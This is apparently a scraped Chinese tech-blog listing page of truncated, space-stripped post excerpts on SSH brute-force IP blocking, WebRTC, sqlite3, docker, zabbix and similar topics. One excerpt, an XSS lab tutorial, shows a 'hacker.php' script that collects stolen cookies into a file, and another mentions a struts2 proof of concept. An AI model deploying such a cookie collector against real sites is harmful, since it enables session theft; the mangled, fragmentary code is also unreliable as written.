1)结合/var/log/secure文件,将ssh登陆失败次数大于N的IP封顶N=3
SEC_FILE=/var/log/secure
foripin`grep"Failedpassword"$SEC_FILE|grep-Eo"([0-9]{1,3}\.){3}[0-9]{1,3}"|sort-n|uniq-c|awk‘{if($1>$N)print$2}‘`
do
iptables-AINPUT-s$ip-ptcp--dport22-jDROP
done
分类:
其他好文 时间:
2017-03-09 15:57:34
阅读次数:
115
cccc.jsp
Title
()确定
(){
=().();
();
..=+;
}bbbb.jsp
Title
()查看参数
(){
=;
();
}
分类:
Web程序 时间:
2017-03-09 15:57:01
阅读次数:
170
#!/bin/bashfunctionbuild_xcode(){echo"***buildingWebRTCfortheia32iOSsimulator";exportGYP_GENERATORS="xcode";exportGYP_DEFINES="build_with_libjingle=1build_with_chromium=0libjingle_objc=1OS=iostarget_arch=ia32clang_xcode=1";exportGYP_GENERATOR_FLAGS="$GYP_GE..
分类:
Web程序 时间:
2017-03-09 15:56:42
阅读次数:
275
说明:之前在CentOS7下配置过bridge,现在讲bridge模式改为普通模式后,查看网卡的时候还是可以看到很多垃圾信息,想彻底删除自己不想要的网卡配置信息,操作如下:[root@linux-node1~]#ipaddlist
1:lo:<LOOPBACK,UP,LOWER_UP>mtu65536qdiscnoqueuestateUNKNOWNqlen1
link..
分类:
其他好文 时间:
2017-03-09 15:56:30
阅读次数:
198
一、如何进入sqlite3交互模式进行命令操作?1、确认sqlite3是否已经安装进去python命令行,执行>>>importsqlite3
>>>没有报错,说明sqlite3已经成功安装了2、如何进入sqlite3命令行sqlite3/path/to/dbname直接执行sqlite3加数据库名即可~sqlite3~/Downloads/..
分类:
数据库 时间:
2017-03-09 15:55:47
阅读次数:
6607
一,算法原理冒泡排序是交换排序的一种,原理是通过比较相邻两个元素的大小,如果发现顺序不对,就交换这两个元素的位置。当第一次循环结束时,最大的元素就被筛选出来,然后进入第二次循环,以此类推,直到没有任何一对数据进行比较。下面看一个案例:假设有5个数字,依次为:..
分类:
编程语言 时间:
2017-03-09 15:55:05
阅读次数:
117
runuser命令runuser命令使用一个替代的用户或者组ID运行一个Shell。这个命令仅在root用户时有用。仅以会话PAM钩子运行,并且没有密码提示。如果用一个非root用户,并且该用户没有权限设置userID,这个命令将会因为程序没有setuid而失败。因runuser不会运行认证和账户PAM钩子,..
分类:
其他好文 时间:
2017-03-09 15:54:41
阅读次数:
1881
1.oncontextmenu="window.event.returnValue=false"将彻底屏蔽鼠标右键<tableborderoncontextmenu=return(false)><td>no</table>可用于Table2.<bodyonselectstart="returnfalse">取消选娶防止复制3.onpaste="returnfalse"不准粘贴4.oncopy="returnfals..
分类:
编程语言 时间:
2017-03-09 15:49:36
阅读次数:
149
0.准备RedHatEL6.5Linuxdocker2.6.32-431.el6.x86_64#1SMPSunNov1022:19:54EST2013x86_64x86_64x86_64GNU/Linux软件包:docker-io-1.7.1-2.el6.x86_64.rpm lua-alt-getopt-0.7.0-1.el6.noarch.rpmlua-filesystem-1.4.2-1.el6.x86_64.rpmlua-lxc-1.0.9-1.el6.x86_64.rpm lxc-1.0..
分类:
其他好文 时间:
2017-03-09 15:47:37
阅读次数:
805
华为交换机S5700升级实例近期我写了一篇文章,是在测试vSphere虚拟交换机中的"专用VLAN",此功能需要上层交换机的支持。专用VLAN,思科称为PVLAN,华为称为MUXVLAN。文章详见http://wangchunhai.blog.51cto.com/225186/1857192我的环境中都是华为的交换机。先在一个环境中,测..
分类:
其他好文 时间:
2017-03-09 15:45:37
阅读次数:
1651
由于jquery禁止通过ajax进行跨域请求,所以在通过ajax请求另外一个不同域名服务api的时候会报错:“No‘Access-Control-Allow-Origin‘headerispresentontherequestedresource.Origin‘null‘isthereforenotallowedaccess”最简单的两个解决办法:1、在django中return的时候设置def..
分类:
Web程序 时间:
2017-03-09 15:45:07
阅读次数:
192
文件特殊权限SUID设置的对象:文件产生的作用:可使对于该文件有x权限的执行者获得程序所有者Owner的权限,只对binaryprogram有效举例:/usr/bin/passwd该文件权限为:-rwsr-xr-x对于Others的用户帐号有x执行权限,并且其owner权限处设了s,所以可以让others的帐号对于该文件有了..
分类:
系统相关 时间:
2017-03-09 15:44:31
阅读次数:
252
写这篇直播文章之前声明一下,我不是hacker。至于漏洞利用更不是我的强项。漏洞利用只是我的一个爱好。呵呵---怎么敲出来之后感觉有些zb,不管了。最近一个新的高危漏洞(struts2)被公布,看到群里有人上传了一个poc随即立马取消,众小hacker纷纷唾沫横飞,其实完全不必,网上早已..
分类:
其他好文 时间:
2017-03-09 15:44:18
阅读次数:
172
众所周知,PrintScreen截屏,截取的是整个屏幕,Alt+PrintScreen截取的是当前活动窗口范围,点击开始菜单,激活开始菜单的窗口,此时Alt+PrintScreen,截取的范围如下,是不是跟看到的(想象中的?)有点不同?
分类:
其他好文 时间:
2017-03-09 15:44:05
阅读次数:
131
系统环境:centos6.6zabbix_agent版本:zabbix-3.2.1zabbix官网的安装包里面包含了两种包这里面有两种源码包,一种是安装zabbxi_server的包,可以通过制定参数--enable-agent的方式安装Agent一种是安装zabbixagent的包,解压配置即可,一。下载zabbix安装包(第一种方式)[root..
分类:
系统相关 时间:
2017-03-09 15:43:33
阅读次数:
216
企业需求,需要在不对外开放的网络中,部署内部yum源,可以让内部的服务器通过这台镜像yum源,安装日常所需软件。一、准备:1).安装http服务器使用Nginx服务器提供http服务安装所需软件yuminstallrsynccreaterepohttpd-y2).Nginx配置#vi/usr/local/nginx/conf/nginx.confserver..
分类:
其他好文 时间:
2017-03-09 15:43:01
阅读次数:
204
测试环境:hacker端andvictim端1,hacker端(hacker.php)的程序内容如下:<?php$cookie=$_GET[‘cookie‘];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序内容如下:<html><head><title>xss跨站..
分类:
其他好文 时间:
2017-03-09 15:41:57
阅读次数:
162
